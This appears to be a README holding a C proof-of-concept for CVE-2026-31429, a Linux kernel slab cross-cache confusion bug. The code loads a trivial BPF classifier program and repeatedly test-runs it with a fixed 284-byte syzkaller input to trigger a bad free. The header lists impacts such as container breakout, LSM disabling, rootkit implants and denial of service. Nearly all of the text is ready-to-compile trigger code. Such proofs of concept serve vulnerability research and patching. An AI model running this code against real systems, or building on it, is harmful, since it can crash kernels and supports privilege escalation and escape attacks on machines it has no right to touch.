README.md
Rendering markdown...
/*
POC for CVE-2026-31429
Linux Kernel >= 6.3 < 6.12.82 Slab Cross-Cache Confusion Vulnerability
Discovered by Antonius w1sdom - bluedragonsec.com
gcc -O2 -o cve-2026-31429-poc-only cve-2026-31429-poc-only.c
might require root privilege !
related security impacts :
- mitigation bypass
- disabling LSM
- kernel rootkit implants
- container breakout
- denial of service
*/
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#ifndef __NR_bpf
#define __NR_bpf 321
#endif
/* BPF insns: ld_imm64(r0,0) + exit — 3 insns = 24 bytes */
static uint8_t bpf_prog_bytes[] = {
0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
static uint8_t syz_data[284] = {
0x60,0xdc,0x24,0x19,0xdd,0x5e,0x95,0xd4,0x73,0x79,0xd5,0x04,0xef,0x23,0xc1,0x79,
0x45,0x52,0xaa,0x7b,0x7d,0x1d,0x56,0xfa,0xba,0x28,0x2e,0x46,0xc9,0x45,0x81,0x3d,
0x60,0x90,0xa3,0x11,0x47,0xc0,0x7f,0x95,0xf2,0x71,0x69,0xcb,0x54,0xbe,0x67,0x59,
0x79,0x28,0x85,0xcb,0x60,0xfa,0x32,0x80,0x61,0xa0,0xc9,0x05,0xc3,0xaa,0x1e,0x4c,
0x7b,0x82,0xf5,0x74,0x69,0x25,0x10,0x83,0xa0,0x12,0x8e,0x50,0xde,0xb0,0x10,0x72,
0xd9,0xc4,0x7a,0x94,0xca,0x02,0xb3,0xf7,0x4a,0xf9,0xba,0xcf,0xb5,0xf7,0x06,0x13,
0x36,0x1b,0x48,0x01,0xbe,0xd2,0x6b,0x41,0x30,0xf9,0x68,0x1e,0xd2,0xa7,0xc6,0x93,
0xff,0x8e,0xd1,0xea,0xf8,0x20,0xc0,0x60,0x13,0x33,0xe5,0xed,0x3f,0xd2,0xdc,0x8a,
0x5d,0xea,0xbe,0xeb,0x37,0xaf,0x12,0x0a,0x72,0xe5,0x00,0x8f,0xea,0xf8,0xae,0x0f,
0x59,0x9d,0xc1,0x86,0xc5,0xd5,0x8c,0x54,0x4a,0x1e,0xc8,0x83,0xf4,0xbc,0x04,0x6e,
0xd9,0x7a,0xf6,0x39,0x06,0xc0,0x12,0xab,0x0b,0xa6,0xa6,0x6e,0x06,0xcc,0x06,0x17,
0x78,0xe5,0x95,0x13,0x1c,0x15,0xcd,0xdf,0x7c,0x57,0x75,0xe3,0xaa,0x3d,0x8a,0x14,
0x13,0x97,0xed,0x95,0x93,0x90,0x27,0x81,0xf2,0xa1,0x64,0x32,0x5f,0x30,0x4c,0xba,
0x56,0x6f,0xa5,0x7e,0xef,0xff,0xa7,0x9e,0xa5,0xbb,0x08,0x71,0xd9,0x9f,0x3e,0xbb,
0x4c,0x46,0xed,0x51,0xc9,0x55,0x2b,0xda,0x25,0xa8,0x12,0x85,0xdc,0x0b,0x06,0x4a,
0xa7,0xfc,0xfb,0x00,0xf7,0x8a,0x33,0x24,0x8e,0x4d,0xf8,0x87,0xf2,0xe6,0x09,0x5c,
0x05,0xc9,0x97,0x20,0x96,0x66,0xf9,0xb5,0xad,0x2f,0xed,0x68,0x41,0xfa,0xb9,0x93,
0x28,0x88,0x5b,0x45,0x5e,0x61,0x6f,0x62,0x94,0xaa,0x17,0x68,
};
static int bpf_load(void)
{
uint8_t attr[0x94];
memset(attr, 0, sizeof(attr));
*(uint32_t*)(attr+0x00) = 3; /* SCHED_CLS */
*(uint32_t*)(attr+0x04) = 3; /* insn_cnt */
*(uint64_t*)(attr+0x08) = (uint64_t)bpf_prog_bytes;
*(uint64_t*)(attr+0x10) = (uint64_t)"GPL";
return (int)syscall(__NR_bpf, 5, attr, 0x94);
}
static long bpf_run(int fd, void *data, uint32_t sz,
uint32_t repeat, uint32_t flags)
{
uint8_t attr[0x50];
memset(attr, 0, sizeof(attr));
*(uint32_t*)(attr+0x00) = (uint32_t)fd;
*(uint32_t*)(attr+0x08) = sz;
*(uint64_t*)(attr+0x10) = (uint64_t)data;
*(uint32_t*)(attr+0x20) = repeat;
*(uint32_t*)(attr+0x40) = flags; /* BPF_F_TEST_RUN_ON_CPU = 4 */
*(uint32_t*)(attr+0x44) = 0; /* cpu = 0 */
return syscall(__NR_bpf, 10, attr, 0x50);
}
int main(void)
{
printf("repro2 — warn_free_bad_obj (syzkaller exact data)\n");
printf("uid=%d euid=%d\n", getuid(), geteuid());
/* Setup mmap persis seperti syzkaller */
syscall(__NR_mmap, 0x1ffffffff000ul, 0x1000ul,
0ul, 0x32ul, -1, 0ul);
syscall(__NR_mmap, 0x200000000000ul, 0x1000000ul,
7ul, 0x32ul, -1, 0ul);
syscall(__NR_mmap, 0x200001000000ul, 0x1000ul,
0ul, 0x32ul, -1, 0ul);
int fd = bpf_load();
if (fd < 0) {
printf("[-] BPF_PROG_LOAD: %s\n", strerror(errno));
return 1;
}
printf("[+] prog fd=%d\n", fd);
printf("[*] Trigger: syz_data=284B flags=4 repeat=4\n");
long ret = bpf_run(fd, syz_data, 284, 4, 4);
printf("[*] ret=%ld\n", ret);
/* Loop untuk reliability */
for (int i = 0; i < 50; i++)
bpf_run(fd, syz_data, 284, 4, 4);
printf("[+] Done — cek: dmesg | grep warn_free\n");
close(fd);
return 0;
}